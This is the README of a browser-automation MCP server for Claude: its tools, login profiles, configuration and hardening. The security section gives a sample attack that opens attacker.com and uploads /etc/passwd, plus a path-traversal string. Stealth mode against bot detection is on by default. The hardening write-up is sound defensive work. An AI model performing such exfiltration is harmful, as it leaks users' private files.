A Model Context Protocol server that gives Claude (or any MCP client) a full browser — open pages, read content, click, type, take screenshots, inspect the accessibility tree, manage tabs, and emulate devices. Powered by Playwright with stealth mode and persistent cookie/localStorage profiles. HTTP transport, runs as a daemon in its own process.
Claude Code ──HTTP──▶ browser-mcp ──Playwright──▶ Chromium (headless)
│
├── MCP sessions (per-client McpServer + transport)
├── named profiles (persistent cookies / localStorage)
├── BrowserContext per profile (reused by sessions)
├── 25 tools: open / read / click / type / snapshot / …
└── network ring, AX snapshot store, CSRF-hardened HTTP
Disclaimer: This tool automates browser interactions and may violate the terms of service of websites it accesses. You are solely responsible for how you use it and which sites you interact with. The authors assume no liability for any consequences arising from its use.
- Why
- Quick start
- Features
- Named profiles
- Tools reference
- Configuration
- Architecture
- Security model
- Testing
- Docker
- Platform notes
- Development
- FAQ
- License
Claude Code's built-in WebFetch can grab a URL as text, but it's a one-shot:
no clicks, no form fills, no cookies, no state. For anything beyond "paste
this article":
- Log into the site, then do X. browser-mcp keeps cookies/localStorage on
disk in a named profile, so an authenticated session survives restarts. Log
in once via
browser_open_visible, come back headless tomorrow. - "What's on this SPA right now?"
browser_snapshotreturns the accessibility tree (role, name, value, state) via Chrome DevTools Protocol. Much more reliable than scraping Markdown on a React dashboard. - Form-driven workflows.
browser_click/browser_typeuse Playwright's auto-waiting with role/label locators — stable across markup changes, no CSS selectors to maintain.browser_expectretries assertions up to a timeout, so you don't have to weave waits manually. - Capture evidence.
browser_savewrites PDF / MHTML / raw HTML;browser_screenshotcaptures viewport/full-page/element. Useful for the "show me what the page looked like when you filed the bug" handoff. - Debug SPA behaviour.
browser_network_logexposes a ring buffer of the last 500 requests — URL, method, status, timing, failure reason — so you can find the 401 the page silently swallowed. - Agent-friendly surface. Role-based locators + accessibility snapshots mean the model doesn't have to invent CSS selectors or guess the markup.
# Published package (preferred)
npm install -g @graphmemory/browser-mcp
browser-mcp
# Or without install
npx -y @graphmemory/browser-mcp
# Or Docker (see "Docker" below for auth requirements)
docker run --rm -p 7777:7777 -e BROWSER_MCP_API_KEY=$(openssl rand -hex 32) \
ghcr.io/graph-memory/browser-mcp:latestChromium is installed automatically on first run (postinstall hook).
Boot log:
browser-mcp listening on http://127.0.0.1:7777/mcp
health → http://127.0.0.1:7777/health
/mcp → default profile
/mcp/<name> → named profile (e.g. /mcp/test1)
auth → DISABLED (loopback only)
cors_origin → null
max_sessions → 50
Add to ~/.claude.json (user-global) or .mcp.json (project-local):
{
"mcpServers": {
"browser": {
"type": "http",
"url": "http://127.0.0.1:7777/mcp"
}
}
}With auth (required when bound to a non-loopback interface):
{
"mcpServers": {
"browser": {
"type": "http",
"url": "http://127.0.0.1:7777/mcp",
"headers": { "Authorization": "Bearer ${BROWSER_MCP_API_KEY}" }
}
}
}Ask Claude in plain language:
Open example.com, find the "Sign in" link, read the resulting page, and fill the email field with test@example.com.
It will sequence browser_open → browser_click → browser_read →
browser_type for you. Keep iterating without leaving the conversation.
browser_open { url: "https://example.com" }
browser_snapshot { compact: true } # what can I click/type
browser_click { target: "Sign in", target_type: "role", role: "button" }
browser_type { target: "Email", target_type: "label", text: "a@b.co" }
browser_expect { assertion: "url_matches", expected: "/dashboard$" }
browser_read { mode: "markdown" }
browser_save { format: "pdf", path: "./dashboard.pdf" }
browser_network_log { failed_only: true, limit: 20 }
browser_cookies { action: "get", urls: ["https://example.com/"] }
- 25 tools covering navigation, reading, interaction, assertions, IO, network inspection, cookies, permissions, and device emulation. See the Tools reference.
- Persistent named profiles. Each URL path (
/mcp/<name>) gets its own cookies and localStorage under~/.browser-mcp/profiles/<name>/. Log in once; restart the supervisor or Claude Code; the session is still there. - Accessibility-first.
browser_snapshotpulls the AX tree from Chrome DevTools Protocol (Playwright 1.40 removed the built-in AX API). Compact mode strips decorative containers and keeps only interactive elements plus landmarks — perfect for agents that need "what can I click" without reading React-generated DOM noise. - Diffable snapshots.
browser_snapshot { store_as: "before" }→ do something →{ diff_against: "before" }returns added/removed/state-changed nodes as a compact diff. Auto-compact to suppress spurious noise. - Role/label locators. Every interact tool accepts
target_type: role|label|text|placeholder|testid|selector. Preferrolefor buttons/links andlabelfor form fields — robust against markup changes, zero CSS maintenance. browser_expectwith retry. 13 assertion kinds (visible/hidden/enabled/ disabled, text_equals/contains/matches, value_equals, count, url_equals/matches, title_equals/matches). Retries up to a timeout so you don't need a separatebrowser_waitfor flaky conditions.browser_readwith compact mode. Markdown/text/HTML extraction; the optionalcompactflag strips nav/header/footer/aside/script/style/iframe and ARIA landmark chrome. Automatic on text/html (pages would otherwise be drowned in boilerplate); off on markdown (Readability already picks the article).- Network ring buffer. 500 most recent requests per profile, across all tabs. Filter by tab, URL regex, method, min_status, or failed_only. Surfaces the 4xx/5xx the UI quietly swallowed.
- Visible mode for login.
browser_open_visibleshuts down the headless context and reopens in a visible window for manual interaction (CAPTCHAs, SSO, 2FA). Cookies land in the persistent profile; closing the window returns to headless. - Device emulation.
browser_configureapplies viewport/DSR/UA/mobile/ locale/color-scheme presets. Nameddevice_preset(iphone-15, ipad-pro, pixel-8, desktop-retina…) applies a full profile atomically. - File IO.
browser_savewrites PDF (headless only)/MHTML/HTML;browser_uploadwires<input type=file>with path validation;browser_download_waitcaptures a download triggered by click or navigation, honours server-suggested filename. - Stealth plugin.
playwright-extra+puppeteer-extra-plugin-stealthapplied by default. Disable with--no-stealthif it breaks a specific site. - Supervisor-env isolation. All
BROWSER_MCP_*vars (API key, host, caps) are filtered out of Chromium's env so page scripts can't fingerprint the supervisor configuration. - CSRF-hardened HTTP.
Content-Type: application/jsonrequired,Originheader whitelist, API key compared withcrypto.timingSafeEqual. - Refuse-to-start safety. Bound to a non-loopback interface without an
API key? Exits with code 2 and an explanation. Override with
--allow-insecureif you know what you're doing. - Session + tab TTL. Idle MCP sessions reaped after
session_ttl(default 30 min); inactive tabs auto-closed aftertab_ttl(default 10 min). Hard cap on concurrent sessions (max_sessions, default 50). - Multi-arch Docker image. linux/amd64 + linux/arm64, non-root
browseruser,tinias PID 1 for zombie reaping, healthcheck wired to/health. - Full test suite. 304 tests (unit + integration against a real headless Chromium) covering every tool handler, the HTTP server (auth/CSRF/session lifecycle), and the AX-tree pipeline. See Testing.
Each MCP endpoint URL can include a profile name that isolates cookies, localStorage, and browser state:
http://127.0.0.1:7777/mcp → "default" profile
http://127.0.0.1:7777/mcp/test1 → "test1" profile
http://127.0.0.1:7777/mcp/my-scraper → "my-scraper" profile
Profile names must match ^[a-zA-Z0-9_-]{1,64}$ (letters, digits, dashes,
underscores; 1–64 chars) — validated at the HTTP layer so path traversal can't
escape the base directory.
Profiles are stored at ~/.browser-mcp/profiles/<name>/ (override with
--profile-dir or BROWSER_MCP_PROFILE_DIR).
Multiple MCP sessions on the same profile share one BrowserContext. When the
last session on a profile expires, the context shuts down and Chromium exits.
{
"mcpServers": {
"browser": {
"type": "http",
"url": "http://127.0.0.1:7777/mcp"
},
"browser-test": {
"type": "http",
"url": "http://127.0.0.1:7777/mcp/test"
}
}
}All tools accept structured arguments (zod-validated). Responses are single-
block text content (except browser_screenshot, which returns image).
Open a URL in a new tab, or navigate an existing tab if tab_id is given.
Waits for DOMContentLoaded plus a short request-idle settle. Does not
return page content — call browser_read afterwards. Returns HTTP status,
final URL, title, and tab_id.
| Parameter | Type | Required | Description |
|---|---|---|---|
url |
string (URL) | yes | Absolute URL to navigate to |
tab_id |
string | no | If set, navigate this existing tab instead of opening a new one |
Read the current (or specified) tab. mode=markdown (default) extracts the
main article via Mozilla Readability and converts to Markdown. mode=text
returns body innerText. mode=html returns raw HTML.
compact=true strips nav / header / footer / aside / script / style / svg /
iframe and ARIA landmark chrome (banner, navigation, complementary,
contentinfo, search) before rendering. Defaults on for text / html,
off for markdown (Readability already picks the article). Useful for
dashboards / SPAs where Readability bails out.
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
mode |
"markdown" | "text" | "html" |
no | "markdown" |
Extraction mode |
selector |
string | no | — | CSS selector to narrow extraction to a specific element |
compact |
boolean | no | auto | Strip chrome (see above) |
max_chars |
integer | no | 50000 |
Cap output length (also via BROWSER_MCP_MAX_CHARS) |
tab_id |
string | no | active tab | Tab to read from |
Find text occurrences on the current page. Returns up to limit snippets,
each with surrounding context and a stable CSS selector suitable for
browser_click / browser_type.
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
query |
string | yes | — | Substring (case-insensitive) |
limit |
integer (1–50) | no | 10 |
Max matches |
tab_id |
string | no | active tab | Tab to search in |
Click an element using one of several locator strategies. Playwright auto-waits for the element to be visible, enabled, and stable; the server additionally waits for network idle after the click.
Strategy priority (most → least reliable): role > label > text >
placeholder > testid > selector. Prefer role for buttons/links and
label for form fields.
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
target |
string | yes | — | Description of the element (see target_type) |
target_type |
text|role|label|placeholder|testid|selector |
no | text |
Locator strategy |
role |
ARIA role | no | "button" when target_type="role" |
Required for role locator |
exact |
boolean | no | false |
Exact match vs substring |
tab_id |
string | no | active tab | Tab to act on |
Examples:
{ "target": "Sign in", "target_type": "role", "role": "button" }
{ "target": "Home", "target_type": "role", "role": "link", "exact": true }
{ "target": "submit", "target_type": "testid" }Fill an input/textarea/contenteditable with text. Auto-waits for the field to
be actionable. Uses Playwright's fill semantics (existing value is replaced).
If submit=true, presses Enter after typing.
Strategy priority for forms: label > placeholder > testid > selector.
label is the most robust for typical forms.
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
target |
string | yes* | — | Target element (see target_type). *Accepts selector for back-compat |
target_type |
same as click | no | selector |
Locator strategy |
role |
ARIA role | no | — | For role locator (typically textbox) |
exact |
boolean | no | false |
Exact match |
text |
string | yes | — | Text to type |
submit |
boolean | no | false |
Press Enter after typing |
tab_id |
string | no | active tab | Tab to act on |
selector |
string | no | — | Deprecated alias for target with target_type=selector |
Assert a condition on the page. Retries up to timeout_ms before failing —
no separate browser_wait needed for flaky conditions. Returns PASS or
FAIL with expected and actual in the error body.
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
assertion |
one of 13 (see below) | yes | — | What to assert |
target |
string | depends | — | Element target (required for element / text / count / value assertions) |
target_type |
same as click | no | selector |
Locator strategy |
role |
ARIA role | no | — | For role locator |
exact |
boolean | no | false |
Exact match |
expected |
string | number | depends | — | For text/value/count/url/title; for *_matches it's a regex |
timeout_ms |
integer (1–60000) | no | 5000 |
Retry window |
tab_id |
string | no | active tab | Tab to check |
Assertions: visible, hidden, enabled, disabled, text_equals,
text_contains, text_matches, value_equals, count, url_equals,
url_matches, title_equals, title_matches.
Examples:
{ "assertion": "visible", "target": "Sign in", "target_type": "role", "role": "button" }
{ "assertion": "text_contains", "target": "#status", "expected": "done" }
{ "assertion": "count", "target": "input", "expected": 3 }
{ "assertion": "url_matches", "expected": "/dashboard$" }Return an accessibility snapshot — a compact tree of semantic elements (role, name, value, state) pulled from Chrome's accessibility API via CDP. Much more reliable than scraping Markdown on SPAs.
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
selector |
string | no | — | Scope to subtree rooted at this CSS selector |
max_depth |
integer (0–50) | no | — | Truncate deeper children with a "N hidden children" summary |
interesting_only |
boolean | no | true |
Prune decorative/hidden nodes (Playwright convention) |
compact |
boolean | no | auto | Keep only interactive elements + structural landmarks. Auto-on when diffing |
store_as |
string (1–64) | no | — | Save snapshot under this name for later diffing |
diff_against |
string (1–64) | no | — | Return added / removed / changed vs the stored snapshot |
format |
"yaml" | "json" |
no | yaml |
Output format |
tab_id |
string | no | active tab | Tab to snapshot |
Sample output (yaml) — decorative InlineTextBox nodes filtered,
StaticText children whose text matches their parent's name collapsed, and
anonymous containers (listitem, cell) inherit their text content as name:
- RootWebArea "Login" [focused]
- heading "Login" [level=1]
- textbox "Email" [required]
- textbox "Password" [required]
- button "Sign in"
Compact strips generic wrappers, keeping only what the user can interact with plus structural anchors:
- form
- textbox "Email"
- textbox "Password"
- button "Sign in"
Diff output — after store_as: "before" → some actions → diff_against: "before":
── diff vs "before" ──
Added (2):
+ listitem "buy milk"
+ listitem "walk dog"
Changed (1):
~ button "Add" [-] → [focused]
Caveat: the diff is path-based (role+name chain from root). Structural
changes that shift sibling order can cause spurious add/remove pairs on
otherwise-unchanged nodes. Works best for "I clicked X, what appeared" rather
than "detect exactly one element changed". Value changes on textboxes are
reported as changed (value is excluded from node identity).
Grant (or clear) browser permissions — camera, microphone, geolocation, notifications, clipboard, etc. Use before navigating so the prompt never appears.
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
grant |
"all" | "none" | array |
yes | — | Which permissions |
origin |
URL | no | current tab's origin | Origin to apply (http/https only) |
tab_id |
string | no | active tab | Tab whose origin to use |
Supported permissions: geolocation, midi, midi-sysex, notifications,
camera, microphone, background-sync, ambient-light-sensor,
accelerometer, gyroscope, magnetometer, clipboard-read,
clipboard-write, payment-handler, storage-access.
Save the current page to disk.
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
format |
"pdf" | "mhtml" | "html" |
yes | — | Output format |
path |
string | yes | — | Absolute or relative; parent dirs created |
full_page |
boolean | no | false |
PDF only: full scrollable page |
landscape |
boolean | no | false |
PDF only |
tab_id |
string | no | active tab | Tab to save |
- pdf — Chromium's native print-to-PDF. Headless only (Playwright limitation).
- mhtml — single-file archive with resources inlined. Best for offline handoff.
- html — raw
page.content().
Upload files to an <input type="file">. Paths validated to exist before
the call. For <input multiple> pass several files; otherwise one.
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
target |
string | yes | — | File input |
target_type |
selector|label|testid |
no | selector |
Locator strategy |
files |
array of paths (1–32) | yes | — | Absolute or relative; each validated to be a regular file |
tab_id |
string | no | active tab | Tab to act on |
Trigger a download (via click or navigation) and capture the resulting file.
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
action |
click | navigate |
no | click |
How to trigger |
target |
string | iff click | — | Button/link that starts the download |
target_type |
same as click | no | text |
Locator strategy |
role |
ARIA role | no | — | For role locator |
url |
URL | iff navigate | — | Direct download URL |
save_to |
string | yes | — | Path; ends with / or existing dir → server-suggested filename |
timeout_ms |
integer (1–600000) | no | 60000 |
Total wait for start + complete |
tab_id |
string | no | active tab | Tab to act on |
Read, write, or clear cookies in the profile.
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
action |
get | set | clear |
yes | — | Operation |
urls |
array of URLs | no | — | get: scope to these URLs |
cookies |
array of cookie objects | iff set | — | Each needs (domain+path) or a single url. Fields: name, value, domain, path, url, expires, httpOnly, secure, sameSite |
Inspect recent network requests. Ring buffer of the last 500 per profile, across all tabs.
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
tab_id |
string | no | all tabs | Only entries from this tab |
limit |
integer (1–500) | no | 100 |
Max entries |
url_regex |
string (regex) | no | — | Only URLs matching |
method |
HTTP method | no | — | Filter by method |
failed_only |
boolean | no | false |
Only net errors (ERR_*, blocked) |
min_status |
integer (100–599) | no | — | Only responses with status ≥ this |
Output:
── 3 entries (of 47 in ring) ──
14:16:32.170 200 GET https://api/v1/users [xhr, 85ms]
14:16:32.220 404 GET https://api/v1/missing [xhr, 12ms]
14:16:32.300 FAIL(...) POST https://third-party/track [fetch, 2013ms]
Scroll the current tab. up/down by amount pixels; top/bottom jumps.
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
direction |
up|down|top|bottom |
no | down |
Direction |
amount |
integer | no | 800 |
Pixels (ignored for top/bottom) |
tab_id |
string | no | active tab | Tab to act on |
Navigate in history. Only tab_id parameter. back/forward report
Already at earliest/latest history entry when there's nowhere to go.
Wait for an element to reach a given state.
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
selector |
string | yes | — | CSS selector |
state |
visible|hidden|attached|detached |
no | visible |
Target state |
timeout |
integer | no | 10000 |
Max wait (ms) |
tab_id |
string | no | active tab | Tab |
Execute a JavaScript expression in the page and return the JSON-serialized result.
| Parameter | Type | Required | Description |
|---|---|---|---|
expression |
string | yes | JS expression (must return JSON-serializable) |
tab_id |
string | no | Tab |
List tabs (→ marks active), switch active tab, close tab.
Open a URL in a visible (non-headless) Chrome window for manual interaction — login, CAPTCHA, SSO, 2FA. Cookies/localStorage land in the persistent profile. Closing the window returns to headless mode.
| Parameter | Type | Required | Description |
|---|---|---|---|
url |
string (URL) | yes | URL to open |
Take a PNG screenshot. Default viewport; full_page=true for full scroll;
selector for a specific element (scrolled into view first).
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
full_page |
boolean | no | false |
Viewport vs whole page. Ignored when selector set |
selector |
string | no | — | Capture only this element |
tab_id |
string | no | active tab | Tab |
Returns an image content block (PNG, base64).
Change browser settings at runtime. All parameters optional — pass only what you want to change. Some changes trigger a browser-context restart (all open tabs are closed, response flags it).
No-restart (per-tab):
viewport_preset—mobile/tablet/desktop/desktop-hd/desktop-2kviewport_width+viewport_height— customcolor_scheme—light/dark/no-preferencetab_id— which tab
No-restart (context-wide):
user_agent— customua_preset—chrome-desktop/chrome-mobile/safari-desktop/safari-mobile/firefox-desktoplocale— e.g.en-US,ru-RU,ja-JP
Restart required:
device_preset—iphone-15/iphone-se/ipad/ipad-pro/pixel-8/galaxy-s24/desktop-retinadevice_scale_factor— e.g. 2 for retina, 3 for iPhoneis_mobile— enablesisMobile+hasTouch
Device presets:
| Preset | Viewport | Scale | Mobile | Touch |
|---|---|---|---|---|
iphone-15 |
393×852 | 3× | yes | yes |
iphone-se |
375×667 | 2× | yes | yes |
ipad |
820×1180 | 2× | yes | yes |
ipad-pro |
1024×1366 | 2× | yes | yes |
pixel-8 |
412×915 | 2.625× | yes | yes |
galaxy-s24 |
360×780 | 3× | yes | yes |
desktop-retina |
1280×900 | 2× | no | no |
All flags are optional — loopback-only defaults work out of the box. Priority: CLI flag > env var > default.
| Flag | Env | Default | Notes |
|---|---|---|---|
-p, --port |
BROWSER_MCP_PORT |
7777 |
|
-H, --host |
BROWSER_MCP_HOST |
127.0.0.1 |
|
--api-key |
BROWSER_MCP_API_KEY |
(off) | required when host ≠ loopback |
--allow-insecure |
BROWSER_MCP_ALLOW_INSECURE |
false |
override refuse-to-start |
--cors-origin |
BROWSER_MCP_CORS_ORIGIN |
null |
comma-separated origins or * |
--max-sessions |
BROWSER_MCP_MAX_SESSIONS |
50 |
concurrent MCP sessions |
--session-ttl |
BROWSER_MCP_SESSION_TTL_SEC |
1800 |
idle session reaper (30 min) |
--[no-]headless |
BROWSER_MCP_HEADLESS |
1 |
0 = visible |
--[no-]stealth |
BROWSER_MCP_STEALTH |
1 |
playwright-extra + stealth plugin |
--channel |
BROWSER_MCP_CHANNEL |
chrome |
Chromium channel (chrome, msedge, chromium) |
--[no-]javascript |
BROWSER_MCP_JAVASCRIPT |
1 |
|
--viewport |
BROWSER_MCP_VIEWPORT |
1280x900 |
WxH |
--device-scale-factor |
BROWSER_MCP_DEVICE_SCALE_FACTOR |
1 |
|
--[no-]mobile |
BROWSER_MCP_MOBILE |
0 |
|
--user-agent |
BROWSER_MCP_USER_AGENT |
— | |
--locale |
BROWSER_MCP_LOCALE |
— | Accept-Language |
--color-scheme |
BROWSER_MCP_COLOR_SCHEME |
— | |
--proxy |
BROWSER_MCP_PROXY |
— | e.g. http://proxy:8080 |
--proxy-bypass |
BROWSER_MCP_PROXY_BYPASS |
— | comma-separated domains |
--proxy-username |
BROWSER_MCP_PROXY_USERNAME |
— | |
--proxy-password |
BROWSER_MCP_PROXY_PASSWORD |
— | |
--tab-ttl |
BROWSER_MCP_TAB_TTL_SEC |
600 |
inactive tab reaper (10 min) |
--max-chars |
BROWSER_MCP_MAX_CHARS |
50000 |
cap for browser_read |
--max-html-bytes |
BROWSER_MCP_MAX_HTML_BYTES |
10000000 |
HTML cap before JSDOM parse (OOM guard) |
--settle-ms |
BROWSER_MCP_SETTLE_MS |
500 |
quiet-window duration |
--settle-timeout-ms |
BROWSER_MCP_SETTLE_TIMEOUT_MS |
3000 |
hard settle timeout after nav/click |
--profile-dir |
BROWSER_MCP_PROFILE_DIR |
~/.browser-mcp/profiles |
profile base dir |
| Env | Default | Effect |
|---|---|---|
BROWSER_MCP_ALLOW_FILE_URLS |
0 |
Permit file:// in browser_open / browser_download_wait |
BROWSER_MCP_ALLOW_PRIVATE_NETWORKS |
0 |
Permit loopback / RFC1918 / link-local / ULA IPs |
BROWSER_MCP_ALLOW_ANY_WRITE_PATH |
0 |
Disable write sandbox for browser_save / browser_download_wait |
BROWSER_MCP_ALLOW_ANY_UPLOAD_PATH |
0 |
Disable read sandbox for browser_upload |
BROWSER_MCP_SANDBOX_DIR |
~/.browser-mcp |
Base dir for download / upload sandboxes |
BROWSER_MCP_READ_BODY_TIMEOUT_MS |
10000 |
Wall-clock cap on HTTP body read (slow-loris) |
browser-mcp --help prints the CLI list.
browser-mcp is one Node process. Each named profile lazily launches its own
Chromium (launchPersistentContext) on first use. Multiple concurrent MCP
sessions on the same profile share that context. When the last session on a
profile expires, the context shuts down.
Transport: @modelcontextprotocol/sdk's StreamableHTTPServerTransport on
top of node:http. One TCP listener, endpoints /mcp, /mcp/<profile>, and
/health.
Each MCP client gets a session on initialize (random UUID in
mcp-session-id). Sessions have their own McpServer instance and transport.
Idle sessions are reaped after session_ttl via a 60 s interval timer.
Hard caps: max_sessions (503 on overflow), MAX_BODY_BYTES = 1 MB per
request, per-tool zod .max(…) on every user string.
Request pipeline for /mcp:
→ URL check (startsWith /mcp) + profile-name validation
→ Origin check (allowlist; unset Origin = native client, always allowed)
→ Content-Type check (POST requires application/json)
→ Auth check (Bearer, timingSafeEqual)
→ session lookup / create (cap applied on create)
→ MCP SDK transport.handleRequest
src/app.ts exports createApp() which returns the http.Server — no
side effects at import time, which makes integration testing trivial.
src/index.ts is a thin bootstrap that calls createApp().httpServer.listen()
and wires SIGINT/SIGTERM.
One instance per profile. Holds:
- The
BrowserContext(Playwright's persistent context). tabs: Map<tab_id, Page>— 8-char nanoid per tab.lastUsed: Map<tab_id, timestamp>— drives the TTL sweeper.netLog: NetLogEntry[]— fixed-capacity ring (500 entries) fed by pagerequest/requestfinished/requestfailedlisteners.snapshotStore: Map<name, AxNode>— user-named AX snapshots forbrowser_snapshotdiffing._overrides— context-level settings frombrowser_configure(applied on next context creation).
Every 60 s the sweeper closes inactive tabs older than tab_ttl (the
currently-active tab is always spared).
On shutdown() the context is closed and all Chromium subprocesses exit.
Playwright 1.40 removed page.accessibility.snapshot(), so browser-mcp
pulls the AX tree directly from Chrome DevTools Protocol:
CDP Accessibility.enable
├─ full tree: Accessibility.getFullAXTree (for top-level snapshot)
└─ subtree: DOM.querySelector → describeNode → getPartialAXTree
(with fetchRelatives, includes ancestors)
↓
cdpAxToTree(nodes, interestingOnly):
- pick the root node (parent not in the map)
- walk childIds recursively
- skip ALWAYS_NOISY_ROLES (InlineTextBox)
- if interestingOnly: flatten ignored nodes
- collect role/name/value/description + a curated property set
↓
collapseRedundantText(node):
- if parent is anonymous and has StaticText children, promote their text
as the parent's name (gives listitem / cell / row identity)
- drop StaticText children whose text matches parent's name exactly
↓
filterCompact(node): (if compact=true)
- keep interactive roles (button, link, textbox, checkbox, option, …)
- keep structural landmarks (heading, navigation, main, form, dialog,
list, listitem, table, row, cell, …)
- drop everything else; hoist single interesting descendants
↓
renderAxNode(node): YAML-ish output for the wire
- "N role "name" [attr1=v1, attr2, …]"
- indented children
Diff algorithm (diffSnapshots):
- Flatten both trees to
Map<path, AxNode>wherepath = /role|name/role|name/…(value excluded from the signature so textbox edits don't look like remove+add). - Keys present in
afterbut notbefore→added. - Keys present in
beforebut notafter→removed. - Common keys where
stateSummary(a) !== stateSummary(b)→changed. State summary includesvalue,checked,pressed,selected,disabled,expanded,focused.
page.on("request") ── reqStart.set(req, { ts, tab_id })
page.on("requestfinished") ──┐
page.on("requestfailed") ──┤── pushNet({ ts, tab_id, method, url, status?, duration_ms?, failed? })
▼
NetLog ring (capacity 500)
readNetLog walks the ring in chronological order, applying tab/method/
failedOnly/minStatus/urlRegex filters, then slices the most recent limit.
JSDOM-based. stripCompactDom(document) deletes nodes matching
nav, header, footer, aside, script, style, noscript, template, svg, iframe, [role=navigation|banner|contentinfo|complementary|search], [aria-hidden=true], [hidden]. Three flavours:
htmlToMarkdown(html, url, max, fallback, compact)— strips, then Readability → turndown. Falls back toplainTextFallbackor raw-body turndown when Readability bails.stripCompactHtml(html, url)— strips, returns body innerHTML.stripCompactText(html, url)— strips, inserts\n\nbefore block elements, collapses inline whitespace, caps blank lines.
SIGINT/SIGTERM triggers:
1. stop accepting new HTTP connections (httpServer.close)
2. clear session reaper interval
3. close all transports + McpServer instances
4. shutdown each BrowserManager (closes Chromium)
5. process.exit(0)
browser-mcp drives a real Chromium on your machine — anyone who can reach
/mcp can visit arbitrary URLs, exfiltrate logged-in session cookies, solve
CAPTCHAs in your name, and (without the guards below) read arbitrary local
files. The defaults are chosen so this can't happen by accident:
- Refuse-to-start insecure. Bound to a non-loopback host (
0.0.0.0, any LAN IP) AND no API key set? Exit code 2 with a loud error. Override with--allow-insecureif you understand the risk (e.g. isolated VM, intra-Docker-network). - CSRF defense.
/mcpPOSTs must carryContent-Type: application/json(not a CORS-simple type — browsers must preflight and we don't answer OPTIONS). If anOriginheader is present, it must matchBROWSER_MCP_CORS_ORIGIN(default empty — only native clients like curl and Claude Code, which send noOrigin, are allowed). The literal stringnullin the allowlist opts in to sandboxed-iframe /file://pages and is a CSRF vector on loopback without auth — it's not enabled by default. - Body size + slow-loris. 1 MB per request max; the full body must arrive within 10 s (or the socket is torn down). No slow-drip DoS.
- Timing-safe auth. API key comparison uses
crypto.timingSafeEqualso token guessing doesn't benefit from short-circuit string comparison. - Session cap.
max_sessions(default 50) prevents resource exhaustion. - Profile-name regex.
^[a-zA-Z0-9_-]{1,64}$— enforced at the HTTP layer, so../../etc/passwdcan't escape the profile base directory.
The tool surface (browser_open, browser_save, browser_upload, etc.)
can otherwise turn a reachable /mcp endpoint into a local file read /
write primitive. Default-deny, opt-in where you need it:
- URL allowlist for navigation.
browser_open,browser_download_wait(action=navigate), andbrowser_permissions(origin) accept onlyhttp:,https:, andabout:blankby default.file://,javascript:,data:,chrome:,view-source:, and raw private-IP hosts (127.0.0.0/8,10/8,172.16–31/12,192.168/16,169.254/16,::1,fc00::/7,fe80::/10) are rejected. Opt in via:BROWSER_MCP_ALLOW_FILE_URLS=1— allowfile://(for local fixtures).BROWSER_MCP_ALLOW_PRIVATE_NETWORKS=1— allow loopback / intranet / cloud-metadata IPs. Required for Docker-compose setups that curl each other by service name.
- Download / save sandbox.
browser_saveandbrowser_download_waitwrite into~/.browser-mcp/downloads/<profile>/by default. Relative paths resolve against the sandbox; absolute paths that escape it are rejected.BROWSER_MCP_ALLOW_ANY_WRITE_PATH=1disables the sandbox. - Upload sandbox.
browser_uploadreads from~/.browser-mcp/uploads/<profile>/. Drop files there first, or setBROWSER_MCP_ALLOW_ANY_UPLOAD_PATH=1. Without this, onebrowser_open( attacker.com)+browser_upload({ files: ["/etc/passwd"] })exfiltrates any file your uid can read. - Sandbox base dir. Override both sandboxes' root via
BROWSER_MCP_SANDBOX_DIR(defaults to~/.browser-mcp). - Log redaction. Tool args containing cookie values, typed text, JS
expressions, and filesystem paths are redacted in
withLogstderr output so centralized log collectors don't pick up passwords or session tokens. browser_evaluateresult cap. Output truncated atBROWSER_MCP_MAX_CHARS(50 000 by default) so a page returning a 1 GB array can't OOM the supervisor.
- No remote code execution on the supervisor. There is no
eval/child_process/vm/Function()anywhere insrc/.browser_evaluateruns JS in Chromium's renderer sandbox, not on the supervisor. - Env isolation.
BROWSER_MCP_*env vars (API key, host, caps) are filtered out before Chromium is launched, so page scripts can't fingerprint the supervisor config.
Docker image binds to 0.0.0.0 and requires an API key — the
refuse-to-start check kicks in without one.
GET /health returns JSON with status, uptime, session/profile counts, and a
summary of active config. Unauthenticated, safe to probe. Does not reveal
URLs visited, cookies, or any page content.
{
"status": "ok",
"uptime_ms": 123456,
"sessions": 2,
"profiles": 1,
"config": { "host": "127.0.0.1", "port": 7777, "headless": true, "stealth": true, "auth": "on" }
}npm test # run 304 tests once (vitest)
npm run test:watch # watch mode
npm run test:coverage # run + coverage report under coverage/
npm run test:integration # Playwright-backed tests onlyThe suite is split across 26 files:
- Unit (11 files): pure-logic tests for
render.ts(compact helpers), AX-tree manipulation (cdpAxToTreewith synthetic CDP payloads,filterCompact,diffSnapshots,collapseRedundantText,renderAxNode),config.tshelpers,log.ts,lib/auth.ts, netlog ring buffer,resolveLocatorrouting,insecureStartupProblemgate, and mock-driven tool handlers for edge branches (snapshot diff overflow, cookies no-flags, PDF headless error, download failure, permissions without http origin). - Integration (15 files): drive a real headless Chromium via
BrowserManageragainst local HTML fixtures. Covers every tool handler,BrowserManager's public surface, the HTTP server (CSRF / auth / session lifecycle / MCP JSON-RPC / session cap), and the AX-tree pipeline end-to-end. An in-process HTTP test server exercises 2xx/4xx/5xx branches and failed network entries.
Integration tests use BROWSER_MCP_HEADLESS=1 and a throwaway profile
directory under os.tmpdir() — your local ~/.browser-mcp/profiles/ is not
touched. Set SKIP_INTEGRATION=1 to skip the Playwright-backed suite
(useful on environments with no Chromium).
Coverage targets (vitest.config.ts): 90% lines / 85% functions / 80% branches /
90% statements. The ceiling is bounded by Playwright — code inside
page.evaluate(() => …) runs in Chromium's V8, not Node's, so those blocks
can't be instrumented even when the integration tests exercise them
end-to-end.
CI runs the full suite on every push (Linux; npx playwright install --with-deps chromium in the workflow).
docker build -t browser-mcp .
docker run --rm -p 7777:7777 -e BROWSER_MCP_API_KEY=$(openssl rand -hex 32) browser-mcpOr with compose:
# one-time: create a .env file next to docker-compose.yml with a real key
